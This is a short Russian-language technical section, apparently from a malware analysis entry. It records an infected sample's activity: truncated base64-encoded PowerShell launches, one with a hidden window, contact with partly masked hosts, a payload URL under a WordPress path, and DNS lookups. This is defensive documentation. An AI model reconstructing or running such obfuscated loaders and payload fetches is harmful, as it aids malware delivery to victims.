Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAFoAXwBjAEEAQQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBIAEEAVQAnACwAJwBCADEAJwAsACcAQQBBAEEAJwApADsAJABqAFgAQQBDAFEAVQBfACAAPQAgACcAMQAwADMAJwA7ACQAVwA0AEEAQQBjAEEAPQAoACIAe...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1160553.cvr
- 'ac##oda.com':80
- 'ac##oda.com':443
- http://ac##oda.com/wp-includes/yn_gp/
- 'ac##oda.com':443
- DNS ASK an##zzz.net
- DNS ASK ap###asis.com
- DNS ASK ac##oda.com
- DNS ASK co#####ng.isocial.vn
- DNS ASK ax##ta.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAFoAXwBjAEEAQQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBIAEEAVQAnACwAJwBCADEAJwAsACcAQQBBAEEAJwApADsAJABqAFgAQQBDAFEAVQBfACAAPQAgACcAMQAwADMAJwA7ACQAVwA0AEEAQQBjAEEAPQAoACIAe...' (со скрытым окном)